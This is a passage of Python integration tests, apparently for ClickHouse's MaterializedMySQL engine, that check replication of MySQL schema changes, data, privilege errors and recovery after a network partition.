check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_drop")
mysql_node.query("DROP DATABASE test_database_drop")
def create_table_like_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("DROP DATABASE IF EXISTS create_like2")
clickhouse_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("CREATE DATABASE create_like")
mysql_node.query("CREATE DATABASE create_like2")
mysql_node.query("CREATE TABLE create_like.t1 (id INT NOT NULL PRIMARY KEY)")
mysql_node.query("CREATE TABLE create_like2.t1 LIKE create_like.t1")
clickhouse_node.query(
f"CREATE DATABASE create_like ENGINE = MaterializeMySQL('{service_name}:3306', 'create_like', 'root', 'clickhouse')")
mysql_node.query("CREATE TABLE create_like.t2 LIKE create_like.t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\n")
mysql_node.query("USE create_like")
mysql_node.query("CREATE TABLE t3 LIKE create_like2.t1")
mysql_node.query("CREATE TABLE t4 LIKE t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\nt4\n")
check_query(clickhouse_node, "SHOW DATABASES LIKE 'create_like%'", "create_like\n")
clickhouse_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like2")
def create_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_create")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_create")
mysql_node.query("CREATE DATABASE test_database_create DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_create.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("INSERT INTO test_database_create.test_table_1 VALUES(1), (2), (3), (5), (6), (7);")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_create ENGINE = MaterializedMySQL('{}:3306', 'test_database_create', 'root', 'clickhouse')".format(
service_name))
# Check for pre-existing status
assert "test_database_create" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_1 ORDER BY id FORMAT TSV",
"1\n2\n3\n5\n6\n7\n")
mysql_node.query("CREATE TABLE test_database_create.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_create.test_table_2 VALUES(1), (2), (3), (4), (5), (6);")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
clickhouse_node.query("DROP DATABASE test_database_create")
mysql_node.query("DROP DATABASE test_database_create")
def rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename")
mysql_node.query("CREATE DATABASE test_database_rename DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_rename.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("RENAME TABLE test_database_rename.test_table_1 TO test_database_rename.test_table_2")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_2\n")
mysql_node.query("RENAME TABLE test_database_rename.test_table_2 TO test_database_rename.test_table_1")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database_rename")
mysql_node.query("DROP DATABASE test_database_rename")
def alter_add_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_add")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_add")
mysql_node.query("CREATE DATABASE test_database_add DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_add.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_1 INT NOT NULL")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_add ENGINE = MaterializedMySQL('{}:3306', 'test_database_add', 'root', 'clickhouse')".format(
service_name))
assert "test_database_add" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_add.test_table_1 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("CREATE TABLE test_database_add.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_add FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_1 INT NOT NULL, ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1, ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
default_expression = "DEFAULT\t0" if service_name == "mysql57" else "DEFAULT\tid"
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t" + default_expression + "\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_add.test_table_2 VALUES(1, 2, 3, 4, 5), (6, 7, 8, 9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_add.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\t3\t4\t5\n6\t7\t8\t9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_add")
mysql_node.query("DROP DATABASE test_database_add")
def alter_drop_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
mysql_node.query("CREATE DATABASE test_database_alter_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_1 DROP COLUMN drop_column")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_2 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_2 DROP COLUMN drop_column")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_drop.test_table_2 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_drop.test_table_2 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_alter_drop")
mysql_node.query("DROP DATABASE test_database_alter_drop")
def alter_rename_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
mysql_node.query("CREATE DATABASE test_database_alter_rename DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_1 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_1 RENAME COLUMN rename_column TO new_column_name")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_2 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nrename_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_2 RENAME COLUMN rename_column TO new_column_name")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_rename.test_table_2 VALUES(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_rename.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\n3\t4\n5\t6\n7\t8\n9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_alter_rename")
mysql_node.query("DROP DATABASE test_database_alter_rename")
def alter_modify_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
mysql_node.query("CREATE DATABASE test_database_alter_modify DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_1 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_1 MODIFY COLUMN modify_column INT")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_modify ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_modify', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_modify" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_2 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT FIRST")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"modify_column\tNullable(Int32)\t\t\t\t\t\nid\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT AFTER id")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_modify.test_table_2 VALUES(1, 2), (3, NULL)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_modify.test_table_2 ORDER BY id FORMAT TSV", "1\t2\n3\t\\N\n")
clickhouse_node.query("DROP DATABASE test_database_alter_modify")
mysql_node.query("DROP DATABASE test_database_alter_modify")
# TODO: need ClickHouse support ALTER TABLE table_name ADD COLUMN column_name, RENAME COLUMN column_name TO new_column_name;
# def test_mysql_alter_change_column_for_materialized_mysql_database(started_cluster):
# pass
def alter_rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
mysql_node.query("CREATE DATABASE test_database_rename_table DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_3")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename_table ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename_table', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename_table" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_3 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_1\ntest_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_4")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\ntest_table_4\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_4 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_rename_table.test_table_4 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_rename_table.test_table_4 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_rename_table")
mysql_node.query("DROP DATABASE test_database_rename_table")
def query_event_with_empty_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_event")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_event")
mysql_node.query("CREATE DATABASE test_database_event")
mysql_node.query("RESET MASTER")
mysql_node.query("CREATE TABLE test_database_event.t1(a INT NOT NULL PRIMARY KEY, b VARCHAR(255) DEFAULT 'BEGIN')")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(1)")
clickhouse_node.query(
"CREATE DATABASE test_database_event ENGINE = MaterializedMySQL('{}:3306', 'test_database_event', 'root', 'clickhouse')".format(
service_name))
# Reject one empty GTID QUERY event with 'BEGIN' and 'COMMIT'
mysql_cursor = mysql_node.alloc_connection().cursor(pymysql.cursors.DictCursor)
mysql_cursor.execute("SHOW MASTER STATUS")
(uuid, seqs) = mysql_cursor.fetchall()[0]["Executed_Gtid_Set"].split(":")
(seq_begin, seq_end) = seqs.split("-")
next_gtid = uuid + ":" + str(int(seq_end) + 1)
mysql_node.query("SET gtid_next='" + next_gtid + "'")
mysql_node.query("BEGIN")
mysql_node.query("COMMIT")
mysql_node.query("SET gtid_next='AUTOMATIC'")
# Reject one 'BEGIN' QUERY event and 'COMMIT' XID event.
mysql_node.query("/* start */ begin /* end */")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(2)")
mysql_node.query("/* start */ commit /* end */")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_event FORMAT TSV", "t1\n")
check_query(clickhouse_node, "SELECT * FROM test_database_event.t1 ORDER BY a FORMAT TSV", "1\tBEGIN\n2\tBEGIN\n")
clickhouse_node.query("DROP DATABASE test_database_event")
mysql_node.query("DROP DATABASE test_database_event")
def select_without_columns(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS db")
clickhouse_node.query("DROP DATABASE IF EXISTS db")
mysql_node.query("CREATE DATABASE db")
mysql_node.query("CREATE TABLE db.t (a INT PRIMARY KEY, b INT)")
clickhouse_node.query(
"CREATE DATABASE db ENGINE = MaterializedMySQL('{}:3306', 'db', 'root', 'clickhouse') SETTINGS max_flush_data_time = 100000".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM db FORMAT TSV", "t\n")
clickhouse_node.query("SYSTEM STOP MERGES db.t")
clickhouse_node.query("CREATE VIEW v AS SELECT * FROM db.t")
mysql_node.query("INSERT INTO db.t VALUES (1, 1), (2, 2)")
mysql_node.query("DELETE FROM db.t WHERE a = 2;")
# We need to execute a DDL query to flush the data buffer
mysql_node.query("CREATE TABLE db.temporary(a INT PRIMARY KEY, b INT)")
optimize_on_insert = clickhouse_node.query("SELECT value FROM system.settings WHERE name='optimize_on_insert'").strip()
if optimize_on_insert == "0":
res = ["3\n", "2\n", "2\n"]
else:
res = ["2\n", "2\n", "1\n"]
check_query(clickhouse_node, "SELECT count((_sign, _version)) FROM db.t FORMAT TSV", res[0])
assert clickhouse_node.query("SELECT count(_sign) FROM db.t FORMAT TSV") == res[1]
assert_eq_with_retry(clickhouse_node, "SELECT count(_version) FROM db.t", res[2].strip(), sleep_time=2, retry_count=3)
assert clickhouse_node.query("SELECT count() FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count(*) FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM (SELECT * FROM db.t) FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM v FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM merge('db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM remote('localhost', 'db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT _part FROM db.t FORMAT TSV") == "0_1_1_0\n"
assert clickhouse_node.query("SELECT _part FROM remote('localhost', 'db', 't') FORMAT TSV") == "0_1_1_0\n"
clickhouse_node.query("DROP VIEW v")
clickhouse_node.query("DROP DATABASE db")
mysql_node.query("DROP DATABASE db")
def insert_with_modify_binlog_checksum(clickhouse_node, mysql_node, service_name):
mysql_node.query("CREATE DATABASE test_checksum")
mysql_node.query("CREATE TABLE test_checksum.t (a INT PRIMARY KEY, b varchar(200))")
clickhouse_node.query("CREATE DATABASE test_checksum ENGINE = MaterializedMySQL('{}:3306', 'test_checksum', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_checksum FORMAT TSV", "t\n")
mysql_node.query("INSERT INTO test_checksum.t VALUES(1, '1111')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n")
mysql_node.query("SET GLOBAL binlog_checksum=NONE")
mysql_node.query("INSERT INTO test_checksum.t VALUES(2, '2222')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n")
mysql_node.query("SET GLOBAL binlog_checksum=CRC32")
mysql_node.query("INSERT INTO test_checksum.t VALUES(3, '3333')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n3\t3333\n")
clickhouse_node.query("DROP DATABASE test_checksum")
mysql_node.query("DROP DATABASE test_checksum")
def err_sync_user_privs_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("CREATE DATABASE priv_err_db DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE priv_err_db.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(1);")
mysql_node.create_min_priv_user("test", "123")
mysql_node.result("SHOW GRANTS FOR 'test'@'%';")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "1\n", 30, 5)
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(2);")
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "2\n")
clickhouse_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("REVOKE REPLICATION SLAVE ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE REPLICATION CLIENT, RELOAD ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query_with_retry("DETACH DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
time.sleep(3)
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query("ATTACH DATABASE priv_err_db")
assert 'MySQL SYNC USER ACCESS ERR:' in str(exception.value)
assert "priv_err_db" not in clickhouse_node.query("SHOW DATABASES")
mysql_node.query("GRANT SELECT ON priv_err_db.* TO 'test'@'%'")
time.sleep(3)
clickhouse_node.query("ATTACH DATABASE priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
mysql_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("DROP USER 'test'@'%'")
def restore_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._delete_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._delete_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def drop_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._add_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._add_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def network_partition_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_network")
clickhouse_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("DROP DATABASE IF EXISTS test_database_network")
mysql_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("CREATE DATABASE test_database_network;")
mysql_node.query("CREATE TABLE test_database_network.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("CREATE DATABASE test;")
clickhouse_node.query(
"CREATE DATABASE test_database_network ENGINE = MaterializedMySQL('{}:3306', 'test_database_network', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with PartitionManager() as pm:
drop_instance_mysql_connections(clickhouse_node, pm)
mysql_node.query('INSERT INTO test_database_network.test_table VALUES(1)')
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
assert "Can't connect to MySQL server" in str(exception.value)
restore_instance_mysql_connections(clickhouse_node, pm)
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table FORMAT TSV", '1\n')
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_database_network FORMAT TSV", "test_table\n")
mysql_node.query("CREATE TABLE test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test FORMAT TSV", "test\n")
clickhouse_node.query("DROP DATABASE test_database_network")
clickhouse_node.query("DROP DATABASE test")
mysql_node.query("DROP DATABASE test_database_network")
mysql_node.query("DROP DATABASE test")
def mysql_kill_sync_thread_restore_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database;")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("DROP DATABASE IF EXISTS test_database;")
mysql_node.query("CREATE DATABASE test_database;")
mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table VALUES (1)")
mysql_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("CREATE DATABASE test_database_auto;")
mysql_node.query("CREATE TABLE test_database_auto.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
